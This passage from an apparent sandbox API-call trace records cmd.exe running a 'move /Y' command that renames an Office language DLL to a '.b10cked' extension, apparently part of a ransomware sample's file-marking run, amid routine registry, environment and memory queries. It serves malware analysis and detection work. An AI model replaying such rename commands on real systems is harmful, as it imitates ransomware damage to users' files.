lpAddress=0x20f86b, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: 
lpAddress=0x110000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0157.550] GetConsoleOutputCP () returned 0x1b5 [0157.550] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.550] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.550] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.551] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.551] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.551] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.551] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.551] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.551] GetEnvironmentStringsW () returned 0x280210* [0157.552] FreeEnvironmentStringsW 
(penv=0x280210) returned 1 [0157.552] GetEnvironmentStringsW () returned 0x280210* [0157.552] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0157.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7a4 | out: phkResult=0x20e7a4*=0x40) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0xa0, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x0, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x40, 
lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegCloseKey (hKey=0x40) returned 0x0 [0157.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7a4 | out: phkResult=0x20e7a4*=0x40) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x0, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegCloseKey (hKey=0x40) 
returned 0x0 [0157.553] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0157.553] srand (_Seed=0x5b886380) [0157.553] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" [0157.553] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" [0157.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.554] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.554] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.555] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.555] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.555] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.555] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.555] GetEnvironmentStringsW () returned 0x282360* [0157.555] FreeEnvironmentStringsW (penv=0x282360) returned 1 [0157.555] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.555] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.555] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.555] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.555] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.555] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.555] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f570, lpFilePart=0x20f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f56c*="Desktop") returned 0x18 [0157.556] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.556] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.556] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.556] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.556] FindClose (in: 
hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.557] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.557] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.557] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.557] GetEnvironmentStringsW () returned 0x280210* [0157.557] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0157.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.558] GetConsoleOutputCP () returned 0x1b5 [0157.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.558] GetUserDefaultLCID () returned 0x409 [0157.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="0") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="0") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="1") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.559] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.560] GetConsoleTitleW (in: lpConsoleTitle=0x270930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.562] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.562] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.562] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.562] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.562] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.562] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.562] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.566] GetConsoleTitleW (in: lpConsoleTitle=0x20f3a8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.567] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.567] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.567] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.567] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.567] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0157.567] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.567] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.567] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.567] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.567] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.568] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.568] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.568] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.568] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.568] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.568] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.568] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0157.568] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.568] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.568] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.568] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.568] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.568] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.570] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.570] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.571] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.572] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.572] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0157.572] _wcsicmp 
(_String1="PPINTL~1.TRX", _String2="..") returned 66 [0157.572] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~1.trx")) returned 0x2020 [0157.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.572] SetErrorMode (uMode=0x0) returned 0x0 [0157.572] SetErrorMode (uMode=0x1) returned 0x0 [0157.573] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x20eaec, lpFilePart=0x20ead4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", lpFilePart=0x20ead4*="PPINTL~1.TRX") returned 0x3c [0157.573] SetErrorMode (uMode=0x0) returned 0x1 [0157.576] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.576] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0157.576] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0157.576] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl~1.trx")) returned 0x2020 [0157.576] SetErrorMode (uMode=0x0) returned 0x0 [0157.576] SetErrorMode (uMode=0x1) returned 0x0 [0157.576] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x20ef68, lpFilePart=0x20ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", lpFilePart=0x20ed00*="PPINTL~1.TRX") returned 0x3c [0157.576] SetErrorMode (uMode=0x0) returned 0x1 [0157.576] SetErrorMode (uMode=0x0) returned 0x0 [0157.577] SetErrorMode (uMode=0x1) returned 0x0 [0157.577] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f170, lpFilePart=0x20ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x20ed00*="PPINTL.DLL.trx_dll.b10cked") returned 0x4a [0157.577] SetErrorMode (uMode=0x0) returned 0x1 [0157.577] SetLastError (dwErrCode=0x0) [0157.577] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll.b10cked")) returned 0xffffffff [0157.577] GetLastError () returned 0x2 [0157.577] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e67c) returned 0x282128 [0157.577] FindNextFileW (in: hFindFile=0x282128, lpFindFileData=0x20e67c | out: lpFindFileData=0x20e67c) returned 0 [0157.578] GetLastError () returned 0x12 [0157.578] FindClose (in: hFindFile=0x282128 | out: hFindFile=0x282128) returned 1 [0157.579] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cb8) returned 0x282128 [0157.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0157.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20e914, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0157.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll")) returned 0x2020 [0157.580] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\ppintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.580] FindClose (in: 